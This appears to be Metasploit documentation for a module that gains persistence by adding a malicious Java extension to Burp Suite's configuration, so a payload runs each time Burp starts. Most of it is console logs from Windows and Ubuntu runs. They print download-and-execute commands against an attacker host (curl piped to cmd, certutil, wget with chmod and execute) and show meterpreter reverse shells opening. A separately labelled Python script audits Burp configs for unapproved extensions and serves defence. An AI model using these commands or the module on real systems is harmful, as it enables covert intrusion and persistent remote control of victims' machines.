
Burp Extension

documentation/modules/exploit/multi/persistence/burp_extension.md


Vulnerable Application

This module adds a malicious Java-based extension to the Burp Suite configuration file. When Burp is opened, the extension is loaded and the payload is executed.

Tested against Burp Suite Community Edition v2024.9.4, on Ubuntu Desktop 24.04. Tested against Burp Suite Community Edition v2025.12.3 on Windows 10.
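A defender-side check for this persistence technique, added here as an example and not part of the Metasploit module or its documentation: it lists every extension registered in a Burp user settings file whose JAR sits outside an approved directory. The `extension_file`, `name` and `loaded` keys, the nesting of the sample, and the `C:\Tools\BurpExtensions` directory are assumptions; the page does not show the config schema.

```python
import json
import sys
from pathlib import PurePosixPath, PureWindowsPath

# Assumption: each extension entry is a JSON object with an "extension_file"
# key (plus optional "name" and "loaded"); the page does not show the schema.
EXT_KEY = "extension_file"

def pure_path(raw):
    """Parse a path without touching disk (Windows configs audit fine on Linux)."""
    if "\\" in raw or raw[1:2] == ":":
        return PureWindowsPath(raw)
    return PurePosixPath(raw)

def iter_extensions(node):
    """Yield every object that carries EXT_KEY, at any nesting depth."""
    if isinstance(node, dict):
        if EXT_KEY in node:
            yield node
        for value in node.values():
            yield from iter_extensions(value)
    elif isinstance(node, list):
        for value in node:
            yield from iter_extensions(value)

def audit(config, approved_dirs):
    """Return one finding per extension whose file is not under an approved dir."""
    approved = [pure_path(d) for d in approved_dirs]
    findings = []
    for ext in iter_extensions(config):
        path = pure_path(str(ext[EXT_KEY]))
        # PurePath never resolves "..", so treat it as unapproved outright.
        if ".." in path.parts:
            reason = "path contains '..'"
        elif any(type(a) is type(path) and a in path.parents for a in approved):
            continue
        else:
            reason = "outside approved directories"
        findings.append({"name": ext.get("name"), "file": str(path),
                         "loaded": bool(ext.get("loaded")), "reason": reason})
    return findings

# Constructed sample: the two Desktop paths mirror the scenario logs on this
# page; the C:\Tools entries and the nesting are made up for the example.
SAMPLE_CONFIG = {"user_options": {"extender": {"extensions": [
    {"name": "Logger", "loaded": True,
     "extension_file": "C:\\Tools\\BurpExtensions\\logger.jar"},
    {"name": "BuIwiN", "loaded": True,
     "extension_file": "c:\\users\\windows\\desktop\\BuIwiN.jar"},
    {"name": "KdqJR", "loaded": True,
     "extension_file": "/home/ubuntu/Desktop//KdqJR.jar"},
    {"name": "Traversal", "loaded": False,
     "extension_file": "C:\\Tools\\BurpExtensions\\..\\..\\Temp\\x.jar"},
]}}}

if __name__ == "__main__":
    with open(sys.argv[1], encoding="utf-8") as fh:
        for finding in audit(json.load(fh), sys.argv[2:]):
            print(json.dumps(finding))
```

Run it as `python audit_burp.py <UserConfig file> <approved dir> [...]` (the script name is arbitrary); pairing it with file-integrity monitoring on the user settings file catches the modification when it happens rather than at the next audit.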

Verification Steps

  1. Install Burp
  2. Start msfconsole
  3. Get an initial shell on *nix or Windows
  4. Do: use exploit/multi/local/burp_extension_persistence
  5. Do: set session #
  6. Do: set writabledir <directory>
  7. Do: run
  8. Once the extension is installed and Burp is started, you should get a shell

Options

NAME

Name of the extension. If blank, a random name is chosen.

CONFIG

Config file location on target. This is a User Settings file that an extension can be added to.

WritableDir

A directory where we can write the extension

USER

User to target, or current user if blank

GRADLE

If action is set to build, the local path of the Gradle executable used to build the extension. Defaults to /usr/bin/gradle

Action

precompiled

Use pre-compiled bytecode; Gradle is not required.

build

Build the extension locally with Gradle.

Scenarios

Burp 2025.12.3 on Windows 10, precompiled with Windows target

Initial Access

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/VIFzePGTMLa1dcpTvMRQBg & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /VIFzePGTMLa1dcpTvMRQBg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
[*] Client 2.2.2.2 requested /w3
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Client 2.2.2.2 requested /VIFzePGTMLa1dcpTvMRQBg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55729) at 2026-01-16 05:24:25 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...

Install Persistence

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/burp_extension
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set target 2
target => 2
msf exploit(multi/persistence/burp_extension) > set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9812
lport => 9812
msf exploit(multi/persistence/burp_extension) > set writabledir c:\\users\\windows\\desktop
writabledir => c:\users\windows\desktop
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/v3fXAwPgMBDCL44G1aW0KQ %TEMP%\CYdTYFAds.exe & start /B %TEMP%\CYdTYFAds.exe
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/burp_extension) > 
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /v3fXAwPgMBDCL44G1aW0KQ
[*] Started reverse TCP handler on 1.1.1.1:9812 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Home path detected as: C:\Users\windows
[!] The service is running, but could not be validated. Found UserConfig file C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp UserConfig file: C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp JAR file: C:\Users\windows\AppData\Local\BurpSuiteCommunity\burpsuite_community.jar
[*] Creating extension
[*] Using extension name: BuIwiN
[*] Creating JAR file
[*] Writing malicious extension to disk: c:\users\windows\desktop\BuIwiN.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116054809_default_2.2.2.2_burp.config.json_765439.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260116.4809/WIN10PROLICENSE_20260116.4809.rc

Launch Burp

[*] Client 2.2.2.2 requested /v3fXAwPgMBDCL44G1aW0KQ
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /v3fXAwPgMBDCL44G1aW0KQ
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Sending stage (230982 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:9812 -> 2.2.2.2:55876) at 2026-01-16 05:49:34 -0500

Burp 2025.12.3 on Windows 10, build with Java target

Initial Access

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/VIFzePGTMLa1dcpTvMRQBg & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /VIFzePGTMLa1dcpTvMRQBg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55900) at 2026-01-16 05:53:50 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...

Install Persistence

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/burp_extension
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set action build
action => build
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9815
lport => 9815
msf exploit(multi/persistence/burp_extension) > set writabledir c:\\users\\windows\\desktop
writabledir => c:\users\windows\desktop
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/burp_extension) > 
[*] Started reverse TCP handler on 1.1.1.1:9815 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Gradle found
[*] Home path detected as: C:\Users\windows
[!] The service is running, but could not be validated. Found UserConfig file C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp UserConfig file: C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp JAR file: C:\Users\windows\AppData\Local\BurpSuiteCommunity\burpsuite_community.jar
[*] Creating extension
[*] Using extension name: IoWH
[*] Creating JAR file
[*] Building Burp extension jar file locally in /tmp/d20260116-127808-hkcygo
openjdk version "21.0.10-ea" 2026-01-20
OpenJDK Runtime Environment (build 21.0.10-ea+4-Debian-1)
OpenJDK 64-Bit Server VM (build 21.0.10-ea+4-Debian-1, mixed mode, sharing)
Starting a Gradle Daemon (subsequent builds will be faster)

:clean UP-TO-DATE

:compileJava

:processResources

:classes

:jar

:assemble

:compileTestJava NO-SOURCE

:processTestResources NO-SOURCE

:testClasses UP-TO-DATE

:test NO-SOURCE

:check UP-TO-DATE

:build



BUILD SUCCESSFUL in 7s

4 actionable tasks: 3 executed, 1 up-to-date

[+] Successfully built the jar file /tmp/d20260116-127808-hkcygo/build/libs/MetasploitPayloadExtension.jar
[*] Writing malicious extension to disk: c:\users\windows\desktop\IoWH.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116060148_default_2.2.2.2_burp.config.json_518370.bin

Launch Burp

[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260116.0148/WIN10PROLICENSE_20260116.0148.rc
[*] Sending stage (58073 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:9815 -> 2.2.2.2:56020) at 2026-01-16 06:14:57 -0500

Burp 2025.12.3 on Ubuntu 24.04, precompiled with Linux target

Initial Access

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446 
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO wThmilCQ --no-check-certificate http://1.1.1.1:8082/l; chmod +x wThmilCQ; ./wThmilCQ& disown
msf exploit(multi/script/web_delivery) > 
[*] 3.3.3.3    web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 3.3.3.3:43276) at 2026-01-16 06:31:49 -0500

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: ubuntu
meterpreter > sysinfo
Computer     : 3.3.3.3
OS           : Ubuntu 24.04 (Linux 6.14.0-37-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...

Install Persistence

msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/burp_extension
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set target 1
target => 1
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9816
lport => 9816
msf exploit(multi/persistence/burp_extension) > set writabledir /home/ubuntu/Desktop/
writabledir => /home/ubuntu/Desktop/
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:9816 
msf exploit(multi/persistence/burp_extension) > [!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Home path detected as: /home/ubuntu
[!] The service is running, but could not be validated. Found UserConfig file /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp UserConfig file: /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp JAR file: /home/ubuntu/BurpSuiteCommunity/burpsuite_community.jar
[*] Creating extension
[*] Using extension name: KdqJR
[*] Creating JAR file
[*] Writing malicious extension to disk: /home/ubuntu/Desktop//KdqJR.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116073105_default_3.3.3.3_burp.config.json_225090.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/3.3.3.3_20260116.3105/3.3.3.3_20260116.3105.rc

Launch Burp

[*] Sending stage (23404 bytes) to 3.3.3.3
[*] Meterpreter session 2 opened (1.1.1.1:9816 -> 3.3.3.3:59798) at 2026-01-16 07:45:08 -0500

msf exploit(multi/persistence/burp_extension) > 

Burp 2025.12.3 on Ubuntu 24.04, build with Java target

Initial Access

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446 
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO z9hg2BUt --no-check-certificate http://1.1.1.1:8082/l; chmod +x z9hg2BUt; ./z9hg2BUt& disown
msf exploit(multi/script/web_delivery) > 
[*] 3.3.3.3    web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 3.3.3.3:59534) at 2026-01-16 07:54:07 -0500

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: ubuntu
meterpreter > sysinfo
Computer     : 3.3.3.3
OS           : Ubuntu 24.04 (Linux 6.14.0-37-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...

Install Persistence

msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/burp_extension
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set action build
action => build
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9817
lport => 9817
msf exploit(multi/persistence/burp_extension) > set writabledir /home/ubuntu/Desktop/
writabledir => /home/ubuntu/Desktop/
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:9817 
msf exploit(multi/persistence/burp_extension) > [!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Gradle found
[*] Home path detected as: /home/ubuntu
[!] The service is running, but could not be validated. Found UserConfig file /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp UserConfig file: /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp JAR file: /home/ubuntu/BurpSuiteCommunity/burpsuite_community.jar
[*] Creating extension
[*] Using extension name: YBFkQz
[*] Creating JAR file
[*] Building Burp extension jar file locally in /tmp/d20260116-130356-yxz2cv
openjdk version "21.0.10-ea" 2026-01-20
OpenJDK Runtime Environment (build 21.0.10-ea+4-Debian-1)
OpenJDK 64-Bit Server VM (build 21.0.10-ea+4-Debian-1, mixed mode, sharing)
:clean UP-TO-DATE

:compileJava

:processResources

:classes

:jar

:assemble

:compileTestJava NO-SOURCE

:processTestResources NO-SOURCE

:testClasses UP-TO-DATE

:test NO-SOURCE

:check UP-TO-DATE

:build



BUILD SUCCESSFUL in 1s

4 actionable tasks: 3 executed, 1 up-to-date

[+] Successfully built the jar file /tmp/d20260116-130356-yxz2cv/build/libs/MetasploitPayloadExtension.jar
[*] Writing malicious extension to disk: /home/ubuntu/Desktop//YBFkQz.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116075456_default_3.3.3.3_burp.config.json_053290.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/3.3.3.3_20260116.5456/3.3.3.3_20260116.5456.rc

Launch Burp

[*] Sending stage (58073 bytes) to 3.3.3.3
[*] Meterpreter session 2 opened (1.1.1.1:9817 -> 3.3.3.3:52712) at 2026-01-16 07:55:28 -0500